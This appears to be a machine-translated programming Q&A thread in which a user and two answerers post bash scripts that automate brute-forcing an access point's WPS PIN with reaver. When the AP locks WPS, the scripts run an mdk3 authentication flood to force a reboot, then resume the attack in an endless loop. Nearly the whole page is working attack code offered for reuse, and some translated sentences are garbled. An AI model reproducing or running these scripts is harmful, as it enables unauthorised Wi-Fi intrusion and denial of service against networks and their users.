2

首先,对不起我可怜的英语。我正在尝试编写一个 bash 脚本,以便使用 reaver 执行 AP WPS 破解。问题是在尝试了一些 WPS-PIN 之后,AP 锁定了 WPS,所以我的 reaver 没有用。

为了解决这个问题,我执行了一个mdk3攻击来强制 AP 重新启动并能够再次攻击它(重新启动后,WPS 在解锁状态下重新启动)。

这种方法的问题在于:

  1. 当 AP 被锁定时,我必须在 PC 锁定前
  2. 进行 mdk3 攻击,在 AP 重新启动时停止它并再次执行 reaver 攻击。对此的解决方案显然是一个脚本。

我写了以下几行应该解决这个问题。

我不得不说我是一个 bash 脚本的菜鸟,所以这个脚本不是“专业的”,它只是解决我的问题的一个“workarround”。

#!/bin/bash

while true; do
    # Switch to the correct channel and save it into $channel
    echo Detecting AP channel
    timeout 25 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -q # Switch to the AP channel
    rm ap_channel 2> /dev/null
    touch ap_channel
    timeout 5 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
    channel="$(head -1 ap_channel | tail -c 2 | head -c 1)"
    rm ap_channel

    # Attacks the AP while it isn't wps-locked
    rm ap_status 2> /dev/null
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -z "$(grep Locked ap_status)" ]; do
        echo Performing reaver attack
        aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
        timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s REAVER_PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now locked. Performs a mdk3 attack (in order to reboot the AP) while the AP wps-status is Locked
    ((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > /dev/null &
    mdk3_pid=$!
    rm ap_status
    timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    while [ -n "$(grep Locked ap_status)" ]; do
        echo Trying to reboot the AP
        rm ap_status
        timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status
    done

    # The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
    kill -9 $mdk3_pid
    echo AP rebooted. Waiting 2 mins till AP init
    sleep 120
done

这个脚本中的问题是,如果我直接在命令行中执行它与在脚本中执行它,我用于 airodump 输出的 stdout 重定向运行不同。

timeout 10 airodump-ng wlan0mon --wps --essid AP_SSID -c $channel 2> ap_status

我需要一种方法来在脚本中执行上面的行,就好像我直接在 tty 中执行它一样。我无法使用 exec 执行此操作,因为我需要继续执行脚本。

注意:我不能对 airodump-ng 使用 -w 选项,因为它不会保存 WPS 状态。

有人可以帮我吗?

4

2 回答 2

0

我的变种。固定延迟替换dynamic wait。计算尝试引脚和等待时间。

将“-C gnome-screenshot -f”替换为您的屏幕截图程序或将其删除。

!/bin/bash

while true; do

rm attack 2> null
rm ap_status 2> null
rm ap_channel 2> null
rm assoc 2> null

AP_SSID="TARGET_ESSID"
AP_BSSID="TARGET_BSSID"
MY_MAC="YOU_MAC"
MON_INTERFACE=wlan0mon
PREV_SESS_FILE="PREV_SESSION_FILE.wpc"
countTryPin=0
countFile=totalTryPinCount # count file to store total try pin
waitTryReboot=0 # count wait time AP rebooting (DDOS MDK3)
waitReboot=0 # count wait time AP recovery after rebooting
touch $countFile

echo -e -n "\n\nDetect channel"

touch assoc
((reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID -A -s $PREV_SESS_FILE) 2>&1) > assoc &
assoc_pid=$!

while [ -z "$(grep Associated assoc)" ]; do
    sleep 3
    echo -n .
done

echo -e "\n\n"
kill -9 $assoc_pid
wait $assoc_pid 2> null
rm assoc

echo -n "Wait association"
((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
    ap_channel_pid=$!
while [ -z "$(grep successful ap_channel)" ]; do
        sleep 1
        echo -n "."
done

channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
echo -e "\n\Channel set to $channel\n\n"
rm ap_channel

touch ap_status
echo -n -e "\nCheck AP WPS lock"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    echo -n .
    sleep 1
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done

echo -e "\n\n"
((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!

while [ -z "$(grep $AP_SSID ap_status -m 1)" ]; do
    sleep 2
done

kill -9 $airodump_pid
wait $airodump_pid 2> null

while [ -z "$(grep Locked ap_status -m 1)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    echo -e "\n\nBegig reaver attack\n\n"
    echo -n "Wait association"
        ((aireplay-ng -1 0 -e $AP_SSID -a $AP_BSSID -h $MY_MAC $MON_INTERFACE) 2>&1) > ap_channel &
        ap_channel_pid=$!
    while [ -z "$(grep successful ap_channel)" ]; do
        sleep 1
        echo -n "."
    done
    echo -e "\n\n"
    timeout 10 reaver -i $MON_INTERFACE -e $AP_SSID -b $AP_BSSID --no-nacks -vv -s $PREV_SESS_FILE -w -A -g 1 -C gnome-screenshot -f # remove or replace "-C gnome-screenshot -f" to you screenshot programm
    countTryPin=$[countTryPin + 1]
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done


# Force a reboot in the AP to unlock WPS
((mdk3 $MON_INTERFACE a -a $AP_BSSID) 2>&1) > attack &
mdk3_pid=$!

echo -e "\n\n"
while [ -n "$(grep Locked ap_status -m 1)" ] && [ -n "$(grep $AP_SSID ap_status -m 1)" ]; do
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 4
    waitTryReboot=$[waitTryReboot + 4]
    echo -e -n "\rTry calling reboot AP. Wait $waitTryReboot sec."
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
wait $mdk3_pid 2> null

totalTryPin=`cat $countFile`
totalTryPin=$(($totalTryPin + $countTryPin))
echo $totalTryPin > $countFile

echo -e "\n\n"
while [ -z "$(grep $AP_SSID ap_status)" ]; do
    # After reboot AP may be change channel. Run without channel
    ((airodump-ng $MON_INTERFACE --wps --essid $AP_SSID) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 5
    waitReboot=$[waitReboot + 5]
    echo -e -n "\rAP rebooting. Wait $waitReboot sec."
    kill -9 $airodump_pid
    wait $airodump_pid 2> null
done

rm attack
rm ap_status 
rm null
execTime=$(($SECONDS+$waitTryReboot+$waitReboot))
echo -e "\n\nDone $countTryPin try pin.\
            \nCalling reboot AP wait time $waitTryReboot sec.\
            \nAP rebooting wait time $waitReboot sec.\
            \nTotal execute time $SECONDS sec.\
            \nTotal try pin $totalTryPin\n\n"
sleep 3
SECONDS=0
done
于 2017-08-27T10:08:05.953 回答
0

我终于明白了。我找到了解决此问题的解决方法,将命令的标准输出重定向到文件。我发布了脚本,也许有人可以使用它。

!/bin/bash

while true; do

rm attack
rm ap_status
rm ap_channel

# Detects the AP channel
echo Detecting AP channel
timeout 45 reaver -i wlan0mon -e AP_SSID -b AP_BSSID -vv > ap_channel # Switch to the AP channel
timeout 15 aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon > ap_channel
channel="$(head -1 ap_channel | tail -c 3 | head -c 2)"
rm ap_channel
echo Detected AP channel $channel

# Attacks the AP using reaver till the AP locks the WPS
((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -z "$(grep Locked ap_status)" ]; do
    echo Performing reaver attack
    aireplay-ng -1 0 -e AP_SSID -a AP_BSSID -h MY_MAC wlan0mon
    timeout 30 reaver -i wlan0mon -e AP_SSID -b AP_BSSID --no-nacks -vv -s PREV_SESSION.wpc -w -A -g 1 -C gnome-screenshot -f
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# Force a reboot in the AP to unlock WPS
((mdk3 wlan0mon a -a AP_BSSID -m) 2>&1) > attack &
mdk3_pid=$!

((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
airodump_pid=$!
sleep 10
kill -9 $airodump_pid

while [ -n "$(grep Locked ap_status -m 1)" ]; do
    echo Trying to reboot the AP
    ((airodump-ng wlan0mon --wps --essid AP_SSID -c $channel) 2>&1) > ap_status &
    airodump_pid=$!
    sleep 10
    kill -9 $airodump_pid
done

# The AP is now rebooted. Kill the mdk3 process and wait 2 mins to restart reaver attack
kill -9 $mdk3_pid
echo AP rebooted. Waiting 5 mins till AP init
rm attack
rm ap_status
sleep 300

done

延迟设置为很长,但还可以。这取决于AP,您可以更改它们。

要使用该脚本,需要 aircrack、reaver(最新版本,具有 --wps 选项的版本)、timeout 和 mdk3 包。

如果了解 bash 脚本的人想要修改脚本并上传更好的脚本,那就太好了!

于 2017-02-09T11:16:26.713 回答